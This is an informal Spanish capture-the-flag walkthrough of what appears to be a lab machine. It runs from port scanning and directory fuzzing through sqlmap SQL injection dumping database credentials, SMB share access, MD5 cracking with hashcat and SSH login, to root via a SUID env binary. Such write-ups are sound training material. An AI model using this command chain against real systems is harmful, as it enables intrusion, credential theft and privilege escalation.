# Enumeracion de puertos, servicios y versiones
nmap -Pn -n -sS -p- -sV --script vuln --min-rate 5000 -vvv -oN nmap 172.17.0.2

22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.4.52 ((Ubuntu))
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.6.2
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.6.2

>>>>primero chequeamos que tenemos en el servicio web, y al revisar nos conseguimos con panel de login, revisamos su codigo y no conseguimos nada!!!!

>>>> realizamos fuzzing con gobuster
gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 10 -b 404 -x php,txt,html,py,sh,sql,js,png,jpj

===============================================================
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/index.php            (Status: 200) [Size: 2921]
/config.php           (Status: 200) [Size: 0]
/.php                 (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 2076430 / 2076440 (100.00%)
===============================================================

no conseguimos nada por aqui.. asi que ahora pasamos al servicio smb

>>>>> probamos enumerar recursos compartidos

smbmap -u '' -H 172.17.0.2		| no podemos enumerar, necesitamos autenticarnos!!!!

ahora veamos si podemos vulnerar la base de datos que corre detras de la web!!!!

nos vamos al panel de loging y configuramos burpsuite para interceptar una peticion

===================================================================================
POST /index.php HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://172.17.0.2
Connection: keep-alive
Referer: http://172.17.0.2/
Cookie: PHPSESSID=c1pncegora260g9mtvr23bn921
Upgrade-Insecure-Requests: 1

name=admin&password=admin&submit=
===================================================================================

guardamos la peticion en un archivo ----> peticion

ahora le pasamos la peticion a sqlmap

sqlmap -r peticion --dbs --batch			| para enumerar bases de datos!!!!

available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] register
[*] sys

nos conseguimos con 5 bases de datos, vamos a trabajar todas las bases de datos a ver si conseguimos informacion de interes

sqlmap -r peticion -D mysql --tables --batch			| enumeramos las tablas de la base de datos mysql

existen 31 tablas pero la que nos interesa es la tabla user, asi que ahora listaremos sus columnas

sqlmap -r peticion -D mysql -T user --columns --batch		| enumeramos columnas de la tabla user en la bd mysql

existen 47 columnas pero aqui nos interesan las columnas: User y Password asi que dumpeamos esa informacion

sqlmap -r peticion -D mysql -T user -C Password,user --dump --batch

Database: mysql
Table: user
[3 entries]
+-------------+--------------------------------------------------+
| user        | Password                                         |
+-------------+--------------------------------------------------+
| mariadb.sys | <blank>                                          |
| mysql       | invalid                                          |
| root        | *0AC9F3DC0012E7E395296E2D1508927D9CFFBD42 (paso) |
+-------------+--------------------------------------------------+
identificamos el tipo de hash con hash-identifier y se lo pasamos a hashcat 
para intentar descifrar y no conseguimos nada, buscamos un descifrador en la web 
y obtuvimos el mismo resultado, nada!!!!

seguimos buscando mas informacion y saltamos a la siguiente base de datos: register

sqlmap -r peticion -D register --tables --batch					| dumpeamos las tablas de la db register

===========================
Database: register
[1 table]
+-------+
| users |
+-------+
===========================

sqlmap -r peticion -D register -T users --dump --batch				| dumpeamos la tabla users de la db register

Database: register
Table: users
[1 entry]
+------------------+----------+
| passwd           | username |
+------------------+----------+
| KJSDFG789FGSDF78 | dylan    |
+------------------+----------+


nos conseguimos con credenciales para el usuario dylan, probaremos estas credenciales en la web y luego con smbmap para tratar de 
enumerar recursos compartidos

pudimos acceder en la web pero no hay nada, solo un mensaje y chequeando el codigo fuente no hay nada tampoco, probamos conectanos
via ssh y tampoco pudimos establecer conexion, asi que probamos 
esas credenciales tratando de eneumerar recursos compartidos con smbmap

smbmap -u dylan -p KJSDFG789FGSDF78 -H 172.17.0.2				| enumerando recursos compartidos

==================================================================================================================
[+] IP: 172.17.0.2:445	Name: asucar.dl           	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	READ ONLY	Printer Drivers
	shared                                            	READ, WRITE	
	IPC$                                              	NO ACCESS	IPC Service (9dc8f1c1c7e1 server (Samba, Ubuntu))
[*] Closed 1 connections                                                                                                     


==================================================================================================================

logramos conseguir recursos compartidos y aqui podemos ver que tenemos un directorio donde tenemos permisos de lectura y escritura
asi que chequemos este directorio: shared

smbmap -u dylan -p KJSDFG789FGSDF78 -H 172.17.0.2 -r shared			| chequeamos el directorio shared

fr--r--r--               33 Mon May 27 03:58:51 2024	augustus.txt		| conseguimos un archivo de texto asi que nos lo vamos a traer

smbclient //172.17.0.2/shared -U dylan%KJSDFG789FGSDF78 -c 'get augustus.txt'	| descargamos el archivo augustus.txt

al chequear el txt nos conseguimos con un hash
061fba5bdfc076bb7362616668de87c8									| vamos a descifrarlo
hash-identifier 061fba5bdfc076bb7362616668de87c8							| identificamos el hash
MD5													| tipo de hash
hashcat -m 0 -a 0 061fba5bdfc076bb7362616668de87c8 /home/darks/Desktop/Kali/diccionarios/rockyou.txt	| desciframos el hash
061fba5bdfc076bb7362616668de87c8:lovely									| lovely

ahora probamos via ssh con ----> augustus y lovely

ssh augustus@172.17.0.2
passwd: lovely					| estamos entro!!!!

# Escalada!!!!!

sudo -l

(dylan) /usr/bin/java				| podemos ejecutar java como dylan

ahora recordemos que tenemos unas credenciales de dylan, probamos cambiar a dylan con esas credenciales

su dylan
pass: KJSDFG789FGSDF78				| ahora somos dylan

sudo -l						| no podemos ejecutar sudo
find / -perm -4000 2>/dev/null			| conseguimos un bianrio
/usr/bin/env					| nos vamos a gtfobins y buscamos env: ./env /bin/bash -p
/usr/bin/env /bin/bash -p			| vamos chaval, metele el whoami
whoami
#root
